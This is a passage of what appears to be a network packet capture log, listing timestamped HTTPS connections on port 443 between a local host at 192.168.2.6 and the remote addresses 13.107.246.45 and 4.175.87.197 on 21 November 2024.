Nov 21, 2024 09:54:30.682413101 CET	443	49866	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.682476997 CET	49866	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:30.682549000 CET	49866	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:30.682549000 CET	49866	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:30.682573080 CET	443	49866	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.682610989 CET	443	49866	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.685084105 CET	49872	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:30.685201883 CET	443	49872	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.685286045 CET	49872	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:30.685410976 CET	49872	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:30.685452938 CET	443	49872	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.711334944 CET	443	49868	4.175.87.197	192.168.2.6
Nov 21, 2024 09:54:30.720009089 CET	443	49867	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.722950935 CET	443	49867	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.723012924 CET	49867	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:30.723093033 CET	49867	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:30.723123074 CET	443	49867	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.723150015 CET	49867	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:30.723165035 CET	443	49867	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.725524902 CET	49873	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:30.725585938 CET	443	49873	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.725655079 CET	49873	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:30.725821972 CET	49873	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:30.725851059 CET	443	49873	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.865731001 CET	443	49869	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.866187096 CET	49869	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:30.866209984 CET	443	49869	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.866625071 CET	49869	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:30.866638899 CET	443	49869	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.923815966 CET	443	49870	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.924240112 CET	49870	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:30.924267054 CET	443	49870	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:30.924660921 CET	49870	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:30.924669981 CET	443	49870	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:31.012471914 CET	443	49871	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:31.012900114 CET	49871	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:31.012929916 CET	443	49871	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:31.013387918 CET	49871	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:31.013396978 CET	443	49871	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:31.310102940 CET	443	49869	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:31.313299894 CET	443	49869	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:31.313357115 CET	443	49869	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:31.313445091 CET	49869	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:31.313518047 CET	49869	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:31.313549042 CET	443	49869	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:31.313568115 CET	49869	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:31.313575029 CET	443	49869	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:31.316205025 CET	49874	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:31.316284895 CET	443	49874	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:31.316365004 CET	49874	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:31.316536903 CET	49874	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:31.316567898 CET	443	49874	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:31.367126942 CET	443	49870	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:31.370177984 CET	443	49870	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:31.370279074 CET	49870	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:31.370342016 CET	49870	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:31.370342016 CET	49870	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:31.370362997 CET	443	49870	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:31.370374918 CET	443	49870	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:31.373024940 CET	49875	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:31.373131990 CET	443	49875	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:31.373215914 CET	49875	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:31.373404026 CET	49875	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:31.373440027 CET	443	49875	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:31.380650043 CET	443	49868	4.175.87.197	192.168.2.6
Nov 21, 2024 09:54:31.380697966 CET	443	49868	4.175.87.197	192.168.2.6
Nov 21, 2024 09:54:31.380723953 CET	443	49868	4.175.87.197	192.168.2.6
Nov 21, 2024 09:54:31.380758047 CET	49868	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:54:31.380785942 CET	443	49868	4.175.87.197	192.168.2.6
Nov 21, 2024 09:54:31.380811930 CET	49868	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:54:31.380846977 CET	49868	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:54:31.416935921 CET	443	49868	4.175.87.197	192.168.2.6
Nov 21, 2024 09:54:31.417031050 CET	443	49868	4.175.87.197	192.168.2.6
Nov 21, 2024 09:54:31.417033911 CET	49868	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:54:31.417076111 CET	443	49868	4.175.87.197	192.168.2.6
Nov 21, 2024 09:54:31.417088032 CET	49868	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:54:31.417269945 CET	443	49868	4.175.87.197	192.168.2.6
Nov 21, 2024 09:54:31.417330027 CET	49868	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:54:31.417738914 CET	49868	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:54:31.417769909 CET	443	49868	4.175.87.197	192.168.2.6
Nov 21, 2024 09:54:31.417794943 CET	49868	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:54:31.417809010 CET	443	49868	4.175.87.197	192.168.2.6
Nov 21, 2024 09:54:31.445991993 CET	443	49871	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:31.449182987 CET	443	49871	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:31.449240923 CET	49871	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:31.449299097 CET	49871	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:31.449316978 CET	443	49871	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:31.449328899 CET	49871	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:31.449335098 CET	443	49871	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:31.451766968 CET	49876	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:31.451790094 CET	443	49876	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:31.451847076 CET	49876	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:31.451961994 CET	49876	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:31.451975107 CET	443	49876	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:32.402755976 CET	443	49872	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:32.403227091 CET	49872	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:32.403306961 CET	443	49872	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:32.403690100 CET	49872	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:32.403704882 CET	443	49872	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:32.515527010 CET	443	49873	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:32.515923023 CET	49873	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:32.515964985 CET	443	49873	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:32.516371012 CET	49873	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:32.516379118 CET	443	49873	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:32.836344004 CET	443	49872	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:32.839871883 CET	443	49872	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:32.839976072 CET	49872	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:32.840044022 CET	49872	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:32.840044022 CET	49872	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:32.840085983 CET	443	49872	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:32.840111017 CET	443	49872	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:32.842727900 CET	49877	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:32.842773914 CET	443	49877	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:32.842997074 CET	49877	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:32.843139887 CET	49877	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:32.843154907 CET	443	49877	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:32.964184999 CET	443	49873	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:32.964217901 CET	443	49873	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:32.964271069 CET	443	49873	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:32.964287996 CET	49873	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:32.964348078 CET	49873	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:32.964544058 CET	49873	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:32.964586973 CET	443	49873	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:32.964615107 CET	49873	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:32.964629889 CET	443	49873	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:32.966948986 CET	49878	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:32.966998100 CET	443	49878	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:32.967089891 CET	49878	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:32.967272043 CET	49878	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:32.967293024 CET	443	49878	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.031542063 CET	443	49874	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.032023907 CET	49874	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.032114029 CET	443	49874	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.032553911 CET	49874	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.032568932 CET	443	49874	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.163831949 CET	443	49875	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.164243937 CET	49875	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.164299965 CET	443	49875	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.164623976 CET	49875	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.164638042 CET	443	49875	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.238178968 CET	443	49876	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.238619089 CET	49876	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.238660097 CET	443	49876	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.239078999 CET	49876	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.239089012 CET	443	49876	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.468106031 CET	443	49874	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.471203089 CET	443	49874	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.471295118 CET	49874	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.471358061 CET	49874	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.471358061 CET	49874	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.471390963 CET	443	49874	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.471402884 CET	443	49874	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.473793030 CET	49879	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.473826885 CET	443	49879	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.473891973 CET	49879	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.474010944 CET	49879	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.474020958 CET	443	49879	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.646034956 CET	443	49875	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.649146080 CET	443	49875	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.649260044 CET	49875	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.649363995 CET	49875	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.649408102 CET	443	49875	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.649444103 CET	49875	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.649460077 CET	443	49875	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.673418999 CET	49880	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.673481941 CET	443	49880	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.673548937 CET	49880	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.673770905 CET	49880	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.673787117 CET	443	49880	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.680711985 CET	443	49876	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.683990955 CET	443	49876	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.684329987 CET	49876	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.684329987 CET	49876	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.684485912 CET	49876	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.684503078 CET	443	49876	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.686558962 CET	49881	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.686603069 CET	443	49881	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:33.686784983 CET	49881	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.686784983 CET	49881	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:33.686821938 CET	443	49881	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:34.426585913 CET	443	49877	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:34.427263021 CET	49877	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:34.427293062 CET	443	49877	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:34.427500963 CET	49877	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:34.427506924 CET	443	49877	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:34.745928049 CET	443	49878	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:34.746366978 CET	49878	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:34.746414900 CET	443	49878	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:34.746799946 CET	49878	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:34.746805906 CET	443	49878	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:34.872548103 CET	443	49877	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:34.875489950 CET	443	49877	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:34.875567913 CET	49877	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:34.875601053 CET	443	49877	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:34.875628948 CET	443	49877	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:34.875683069 CET	49877	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:34.875710011 CET	49877	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:34.875727892 CET	443	49877	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:34.875741005 CET	49877	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:34.875746965 CET	443	49877	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:34.878312111 CET	49882	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:34.878403902 CET	443	49882	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:34.878483057 CET	49882	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:34.878660917 CET	49882	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:34.878695965 CET	443	49882	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.188685894 CET	443	49878	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.192496061 CET	443	49878	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.192636967 CET	49878	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.192696095 CET	49878	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.192713022 CET	443	49878	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.192728043 CET	49878	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.192733049 CET	443	49878	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.195734024 CET	49883	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.195766926 CET	443	49883	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.195899010 CET	49883	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.196069956 CET	49883	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.196084976 CET	443	49883	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.317562103 CET	443	49879	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.317959070 CET	49879	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.317986012 CET	443	49879	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.318697929 CET	49879	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.318705082 CET	443	49879	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.455482006 CET	443	49880	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.456033945 CET	49880	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.456123114 CET	443	49880	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.456621885 CET	49880	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.456640959 CET	443	49880	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.474808931 CET	443	49881	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.475197077 CET	49881	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.475218058 CET	443	49881	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.475724936 CET	49881	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.475732088 CET	443	49881	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.770545006 CET	443	49879	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.773646116 CET	443	49879	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.773736954 CET	49879	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.773816109 CET	49879	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.773842096 CET	443	49879	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.773855925 CET	49879	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.773863077 CET	443	49879	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.779019117 CET	49884	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.779063940 CET	443	49884	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.779212952 CET	49884	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.779445887 CET	49884	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.779463053 CET	443	49884	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.898663044 CET	443	49880	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.901741028 CET	443	49880	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.901834011 CET	49880	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.901907921 CET	49880	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.901907921 CET	49880	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.901949883 CET	443	49880	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.901981115 CET	443	49880	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.905122042 CET	49885	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.905157089 CET	443	49885	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.905261040 CET	49885	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.905513048 CET	49885	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.905528069 CET	443	49885	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.919162035 CET	443	49881	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.919559002 CET	443	49881	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.919645071 CET	49881	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.919653893 CET	443	49881	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.919694901 CET	443	49881	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.919770002 CET	49881	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.919785976 CET	443	49881	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.919809103 CET	49881	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.919815063 CET	443	49881	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.919852972 CET	49881	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.919857025 CET	443	49881	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.922799110 CET	49886	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.922831059 CET	443	49886	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:35.922913074 CET	49886	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.923074961 CET	49886	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:35.923091888 CET	443	49886	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:36.594392061 CET	443	49882	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:36.594855070 CET	49882	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:36.594902992 CET	443	49882	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:36.595506907 CET	49882	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:36.595520020 CET	443	49882	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:36.976902008 CET	443	49883	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:36.977399111 CET	49883	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:36.977431059 CET	443	49883	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:36.978023052 CET	49883	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:36.978029013 CET	443	49883	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:37.031056881 CET	443	49882	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:37.034384012 CET	443	49882	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:37.034457922 CET	49882	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:37.034563065 CET	49882	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:37.034563065 CET	49882	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:37.034606934 CET	443	49882	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:37.034634113 CET	443	49882	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:37.037116051 CET	49888	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:37.037175894 CET	443	49888	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:37.037249088 CET	49888	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:37.037360907 CET	49888	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:37.037384033 CET	443	49888	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:37.422292948 CET	443	49883	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:37.425396919 CET	443	49883	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:37.425445080 CET	443	49883	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:37.425456047 CET	49883	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:37.425498009 CET	49883	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:37.425563097 CET	49883	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:37.425580978 CET	443	49883	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:37.425596952 CET	49883	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:37.425604105 CET	443	49883	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:37.428575993 CET	49889	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:37.428631067 CET	443	49889	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:37.428777933 CET	49889	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:37.428920984 CET	49889	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:37.428936958 CET	443	49889	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:37.644670010 CET	443	49886	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:37.645195007 CET	49886	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:37.645277977 CET	443	49886	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:37.645818949 CET	49886	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:37.645833015 CET	443	49886	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:37.649971962 CET	443	49884	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:37.650331974 CET	49884	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:37.650348902 CET	443	49884	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:37.650892019 CET	49884	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:37.650902987 CET	443	49884	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:37.754503965 CET	443	49885	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:37.754942894 CET	49885	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:37.754961967 CET	443	49885	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:37.755539894 CET	49885	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:37.755544901 CET	443	49885	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:38.077802896 CET	443	49886	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:38.081037045 CET	443	49886	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:38.081105947 CET	49886	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:38.081183910 CET	49886	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:38.081228018 CET	443	49886	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:38.081254959 CET	49886	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:38.081269979 CET	443	49886	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:38.084311008 CET	49890	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:38.084367037 CET	443	49890	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:38.084436893 CET	49890	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:38.084570885 CET	49890	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:38.084599018 CET	443	49890	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:38.103300095 CET	443	49884	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:38.106359959 CET	443	49884	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:38.106633902 CET	49884	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:38.106677055 CET	49884	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:38.106695890 CET	443	49884	13.107.246.45	192.168.2.6
